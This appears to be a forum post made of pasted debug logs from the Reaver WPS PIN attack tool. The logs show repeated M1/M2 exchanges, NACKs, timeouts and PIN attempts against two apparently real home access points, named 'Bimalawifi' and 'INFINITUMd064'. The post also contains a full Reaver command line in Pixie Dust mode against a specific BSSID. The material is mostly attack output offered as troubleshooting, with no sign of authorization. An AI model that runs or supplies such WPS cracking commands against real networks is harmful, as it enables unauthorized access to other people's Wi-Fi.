WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=15):
57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 36 37 31 RTL8671
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 30 36 2d 30 37 2d 32 37 EV-2006-07-27
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=15):
57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 38 82 79 51 df fa 27 df 69 54 39 75 29 7c e1 2f
WPS: UUID-R - hexdump(len=16): 3a 6d 8c eb 7b 2e 42 91 bf e4 68 db c1 ff bc b5
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 05 08 2e 95 cf a5 1b 15 36 69 1e 64 5c d1 26 7c 3f 22 e9 69 f6 c9 15 b8 ae 12 74 7c 19 88 b9 ec 71 6c 6b a6 cc f7 65 50 c1 01 83 c7 fa 10 7b 7d eb 0e 8d 49 b2 f7 95 56 e0 8a 9c 82 61 95 19 19 af d0 bb 8c d8 13 6e fb 5d be 00 f7 6a d6 c5 14 f5 e7 e6 b1 92 2b b0 27 0d bf f2 59 49 83 a2 48 a7 ea c3 3c 20 79 7f c1 1a 3e 47 23 0b 07 1f bb 60 0d 0c bf 1c fd 4c f3 78 a8 c9 7c da 51 ab 1c 51 7d bb 40 b9 e1 8c 5a 63 eb 17 04 64 bf 96 cd 9a 0f 60 52 0a fd 4a 35 a2 bf dc ff 89 63 d4 b0 c1 d5 99 b3 23 50 09 a2 74 4f 2e b2 1e cc 11 4e b4 6d 75 9c 5e 91 1c 7d 87 b2 7a 20 08 8e 71 9e
DH: public value - hexdump(len=192): 8b cf 78 cc 4a c7 44 1a e1 c9 1f 02 3c 5a da ea 6b 0e 54 8d f0 df 75 b5 d8 75 1b e7 cc 48 65 4b 20 ea a6 9a 34 0a 71 ad fa 02 08 bf 68 e1 52 1f 14 f8 d7 20 8d e0 a5 a3 c9 33 57 92 bf 73 b0 2a fb 12 75 79 bb 70 3e 7d 94 62 e2 eb 05 4d 8b f7 5c e9 59 68 af 6c cc 74 d0 dc 07 3d 99 6f 9a 91 0b b8 5d c3 e1 e3 0a f7 7e 4b 1a 91 ae 47 ca b2 85 1e fe 61 b3 b6 ad 93 77 e1 22 c8 9d 27 4c 32 cf c2 8f c8 87 cc 97 02 29 78 dc e7 f7 f7 bf 72 63 45 c2 da 22 d9 41 43 b8 ee 0e 0d e4 e0 67 7a 4c d1 59 1a dc 81 83 28 f4 b7 b8 d1 f4 11 87 6e 6b 20 5e 06 f8 b4 c7 cf bd 04 70 af d8 bc 95 c4
WPS: DH Private Key - hexdump(len=192): 05 08 2e 95 cf a5 1b 15 36 69 1e 64 5c d1 26 7c 3f 22 e9 69 f6 c9 15 b8 ae 12 74 7c 19 88 b9 ec 71 6c 6b a6 cc f7 65 50 c1 01 83 c7 fa 10 7b 7d eb 0e 8d 49 b2 f7 95 56 e0 8a 9c 82 61 95 19 19 af d0 bb 8c d8 13 6e fb 5d be 00 f7 6a d6 c5 14 f5 e7 e6 b1 92 2b b0 27 0d bf f2 59 49 83 a2 48 a7 ea c3 3c 20 79 7f c1 1a 3e 47 23 0b 07 1f bb 60 0d 0c bf 1c fd 4c f3 78 a8 c9 7c da 51 ab 1c 51 7d bb 40 b9 e1 8c 5a 63 eb 17 04 64 bf 96 cd 9a 0f 60 52 0a fd 4a 35 a2 bf dc ff 89 63 d4 b0 c1 d5 99 b3 23 50 09 a2 74 4f 2e b2 1e cc 11 4e b4 6d 75 9c 5e 91 1c 7d 87 b2 7a 20 08 8e 71 9e
WPS: DH own Public Key - hexdump(len=192): 8b cf 78 cc 4a c7 44 1a e1 c9 1f 02 3c 5a da ea 6b 0e 54 8d f0 df 75 b5 d8 75 1b e7 cc 48 65 4b 20 ea a6 9a 34 0a 71 ad fa 02 08 bf 68 e1 52 1f 14 f8 d7 20 8d e0 a5 a3 c9 33 57 92 bf 73 b0 2a fb 12 75 79 bb 70 3e 7d 94 62 e2 eb 05 4d 8b f7 5c e9 59 68 af 6c cc 74 d0 dc 07 3d 99 6f 9a 91 0b b8 5d c3 e1 e3 0a f7 7e 4b 1a 91 ae 47 ca b2 85 1e fe 61 b3 b6 ad 93 77 e1 22 c8 9d 27 4c 32 cf c2 8f c8 87 cc 97 02 29 78 dc e7 f7 f7 bf 72 63 45 c2 da 22 d9 41 43 b8 ee 0e 0d e4 e0 67 7a 4c d1 59 1a dc 81 83 28 f4 b7 b8 d1 f4 11 87 6e 6b 20 5e 06 f8 b4 c7 cf bd 04 70 af d8 bc 95 c4
WPS: DH Private Key - hexdump(len=192): 05 08 2e 95 cf a5 1b 15 36 69 1e 64 5c d1 26 7c 3f 22 e9 69 f6 c9 15 b8 ae 12 74 7c 19 88 b9 ec 71 6c 6b a6 cc f7 65 50 c1 01 83 c7 fa 10 7b 7d eb 0e 8d 49 b2 f7 95 56 e0 8a 9c 82 61 95 19 19 af d0 bb 8c d8 13 6e fb 5d be 00 f7 6a d6 c5 14 f5 e7 e6 b1 92 2b b0 27 0d bf f2 59 49 83 a2 48 a7 ea c3 3c 20 79 7f c1 1a 3e 47 23 0b 07 1f bb 60 0d 0c bf 1c fd 4c f3 78 a8 c9 7c da 51 ab 1c 51 7d bb 40 b9 e1 8c 5a 63 eb 17 04 64 bf 96 cd 9a 0f 60 52 0a fd 4a 35 a2 bf dc ff 89 63 d4 b0 c1 d5 99 b3 23 50 09 a2 74 4f 2e b2 1e cc 11 4e b4 6d 75 9c 5e 91 1c 7d 87 b2 7a 20 08 8e 71 9e
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): 06 ac e0 bf 27 e9 01 01 69 cc 4b d4 3a 62 f4 1b 46 04 f3 f9 a9 33 43 6d 91 1e f5 8d d9 53 06 7d 0d 3f ba 3f a7 ec bb 26 be be 01 09 0d d2 3d 50 3c 35 71 16 99 57 4d 22 85 14 04 0d 98 76 04 dd a4 35 7e 5e a1 58 55 cd 79 e1 3a 9e ac b7 fa d8 30 2d 55 a8 e4 d3 d0 ae a5 17 13 64 b8 a9 86 35 d1 fb 08 6c 66 9c 88 d9 25 24 bd e3 1a 6d 64 d2 74 c0 04 be 5a 91 18 43 0a 53 31 71 ab 9c 95 a6 5f 7d a3 5d a7 39 0d a7 70 4c e7 24 d3 08 15 53 25 f9 7b 0b dc 8b b4 2d 4c 0d 58 0e 53 2f 4d 78 be 9e 2c 89 29 2e a6 7e 74 1e 88 e5 9d 70 8e 98 a1 17 19 12 0a 0d ac d6 5f 27 91 1a 81 07 21 01
WPS: DH shared key - hexdump(len=192): 06 ac e0 bf 27 e9 01 01 69 cc 4b d4 3a 62 f4 1b 46 04 f3 f9 a9 33 43 6d 91 1e f5 8d d9 53 06 7d 0d 3f ba 3f a7 ec bb 26 be be 01 09 0d d2 3d 50 3c 35 71 16 99 57 4d 22 85 14 04 0d 98 76 04 dd a4 35 7e 5e a1 58 55 cd 79 e1 3a 9e ac b7 fa d8 30 2d 55 a8 e4 d3 d0 ae a5 17 13 64 b8 a9 86 35 d1 fb 08 6c 66 9c 88 d9 25 24 bd e3 1a 6d 64 d2 74 c0 04 be 5a 91 18 43 0a 53 31 71 ab 9c 95 a6 5f 7d a3 5d a7 39 0d a7 70 4c e7 24 d3 08 15 53 25 f9 7b 0b dc 8b b4 2d 4c 0d 58 0e 53 2f 4d 78 be 9e 2c 89 29 2e a6 7e 74 1e 88 e5 9d 70 8e 98 a1 17 19 12 0a 0d ac d6 5f 27 91 1a 81 07 21 01
WPS: DHKey - hexdump(len=32): bb b8 13 1d 9f b4 04 b8 75 3f 79 fa db 30 ad a9 ae 07 51 09 91 61 a3 a8 12 d3 ff 38 bd 7c 9a 07
WPS: KDK - hexdump(len=32): c8 bf 13 a7 3e 12 61 f0 e0 17 c5 59 6e 75 38 d5 06 c4 b3 f2 b5 7b 5d f7 3b a8 5f 65 22 38 3b 31
WPS: AuthKey - hexdump(len=32): 6e 8b 56 a5 b0 ed 05 6a ac 2b 49 cb 5d a8 7e c0 9c 97 08 a5 40 e9 c5 a2 41 09 bf 66 d6 7f ff d8
WPS: KeyWrapKey - hexdump(len=16): 6b 1a 71 73 4e 3a 04 1b 80 fc b7 e0 b7 8d d6 9b
WPS: EMSK - hexdump(len=32): 20 78 6d 23 21 b9 59 85 24 b4 20 fc f9 6a d2 6d 2c 23 45 e6 fe 3a b2 16 6e 9d d1 15 29 77 2e f6
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=422 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: Unexpected state (15) for receiving M1
WPS: returning
[+] Received M1 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
send_packet called from send_termination() send.c:142
[!] WPS transaction failed (code: 0x03), re-trying last pin
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
^Csend_packet called from send_termination() send.c:142

[+] Nothing done, nothing to save.
root@kali:~# reaver -i wlan0mon -b A8:32:9A:00:77:FE -c 1 -vvv -K 1

daveazcarate

2018-04-26, 05:37

WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with 5C:4C:A9:36:90:EC (ESSID: INFINITUMd064)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
WPS: Processing received message (len=424 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
WPS: Enrollee MAC Address 5c:4c:a9:36:90:ec
WPS: Enrollee Nonce - hexdump(len=16): 95 77 23 a5 f2 95 e7 6a c0 f5 57 a2 51 dc 64 2b
WPS: Enrollee Authentication Type flags 0x3f
WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with 5C:4C:A9:36:90:EC (ESSID: INFINITUMd064)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
WPS: Processing received message (len=424 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
WPS: Enrollee MAC Address 5c:4c:a9:36:90:ec
WPS: Enrollee Nonce - hexdump(len=16): 95 77 23 a5 f2 95 e7 6a c0 f5 57 a2 51 dc 64 2b
WPS: Enrollee Authentication Type flags 0x3f
WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x84 [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=24):
52 61 6c 69 6e 6b 20 54 65 63 68 6e 6f 6c 6f 67 Ralink Technolog
79 2c 20 43 6f 72 70 2e y, Corp.
WPS: Model Name - hexdump_ascii(len=28):
52 61 6c 69 6e 6b 20 57 69 72 65 6c 65 73 73 20 Ralink Wireless
41 63 63 65 73 73 20 50 6f 69 6e 74 Access Point
WPS: Model Number - hexdump_ascii(len=6):
52 54 32 38 36 30 RT2860
WPS: Serial Number - hexdump_ascii(len=8):
31 32 33 34 35 36 37 38 12345678
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=11):
54 72 65 6e 64 43 68 69 70 41 50 TrendChipAP
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 55 ad 16 7b ca b5 ca a0 01 8f 5a c9 8a b0 a0 44
WPS: UUID-R - hexdump(len=16): 27 43 37 28 4d 6d 01 dd ef 3e e9 a7 81 3b 7c 43
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 34 81 eb 35 41 6e 80 a4 b6 c6 04 36 e1 7e d5 5f 27 6b 13 ea e2 dc 7e ce 72 75 a2 f5 db d4 b6 73 bb 2b 12 c8 9c a
DH: public value - hexdump(len=192): de 27 12 52 ee 87 95 c3 e6 d7 ba b5 27 8a 70 d8 f8 85 98 76 82 2f 8e 92 7e ef 3b c5 60 bb 87 50 27 74 dc d8 0f 99
WPS: DH Private Key - hexdump(len=192): 34 81 eb 35 41 6e 80 a4 b6 c6 04 36 e1 7e d5 5f 27 6b 13 ea e2 dc 7e ce 72 75 a2 f5 db d4 b6 73 bb 2b 12 c8 9c
WPS: DH own Public Key - hexdump(len=192): de 27 12 52 ee 87 95 c3 e6 d7 ba b5 27 8a 70 d8 f8 85 98 76 82 2f 8e 92 7e ef 3b c5 60 bb 87 50 27 74 dc d8
WPS: DH Private Key - hexdump(len=192): 34 81 eb 35 41 6e 80 a4 b6 c6 04 36 e1 7e d5 5f 27 6b 13 ea e2 dc 7e ce 72 75 a2 f5 db d4 b6 73 bb 2b 12 c8 9c
WPS: DH peer Public Key - hexdump(len=192): 68 f3 de f3 5b 3a 47 1d ae 88 ab 77 8c f4 fa 07 67 c0 43 6b a5 1b eb b8 03 ca c6 a3 37 8a a2 cf 69 c0 6f 6
DH: shared key - hexdump(len=192): 51 91 88 03 fa c5 4b b4 d5 5d 8a 09 ef 69 8c c5 12 c1 41 df 3a 4e a3 4b 7d 23 64 06 7b d8 50 cf b3 49 9a 92 09 d1 7
WPS: DH shared key - hexdump(len=192): 51 91 88 03 fa c5 4b b4 d5 5d 8a 09 ef 69 8c c5 12 c1 41 df 3a 4e a3 4b 7d 23 64 06 7b d8 50 cf b3 49 9a 92 09
WPS: DHKey - hexdump(len=32): 07 06 1f cd d3 03 f3 db 61 96 fb 42 21 cf de 62 d5 0e 02 5b c1 aa a2 64 bd 76 15 34 0e c1 63 c8
WPS: KDK - hexdump(len=32): 12 32 a2 c5 8a c9 03 ac 72 2c 78 a4 a6 5c 96 40 6d 2a 45 4f 28 41 ba f0 a8 39 a7 cd 83 31 2c 7b
WPS: AuthKey - hexdump(len=32): eb 1b b8 ad 18 1e e4 7d bd 30 84 1a 1e 34 dd a7 e4 ed bf 6c 4c a8 b7 67 a1 1f b4 08 e3 bf d7 6c
WPS: KeyWrapKey - hexdump(len=16): 45 86 82 1d d8 95 68 b2 21 1a 42 a4 c7 b6 8a d5
WPS: EMSK - hexdump(len=32): df 8e 7a be fd 3f 90 d6 a5 74 2c 45 d2 fe 8a 0d d6 f8 d5 19 cf 40 f8 4c f6 82 96 df 19 ec a8 6b
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (4)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=56 op_code=3)
WPS: Received WSC_NACK
WPS: Enrollee terminated negotiation with Configuration Error 2
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[!] WPS transaction failed (code: 0x04), re-trying last pin
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with 5C:4C:A9:36:90:EC (ESSID: INFINITUMd064)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=424 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
WPS: Enrollee MAC Address 5c:4c:a9:36:90:ec
WPS: Enrollee Nonce - hexdump(len=16): 50 85 99 07 aa 05 3d 85 49 48 8b 71 b3 5a a7 26
WPS: Enrollee Authentication Type flags 0x3f
WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x84 [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=24):
52 61 6c 69 6e 6b 20 54 65 63 68 6e 6f 6c 6f 67 Ralink Technolog
79 2c 20 43 6f 72 70 2e y, Corp.
WPS: Model Name - hexdump_ascii(len=28):
52 61 6c 69 6e 6b 20 57 69 72 65 6c 65 73 73 20 Ralink Wireless
41 63 63 65 73 73 20 50 6f 69 6e 74 Access Point
WPS: Model Number - hexdump_ascii(len=6):
52 54 32 38 36 30 RT2860
WPS: Serial Number - hexdump_ascii(len=8):
31 32 33 34 35 36 37 38 12345678
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=11):
54 72 65 6e 64 43 68 69 70 41 50 TrendChipAP
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 2
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): a5 ad 35 47 f9 b2 f4 54 af 48 4d ec 82 53 22 81
WPS: UUID-R - hexdump(len=16): d1 7b f7 dd 89 20 1d 11 18 64 f3 be 06 eb 94 49
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
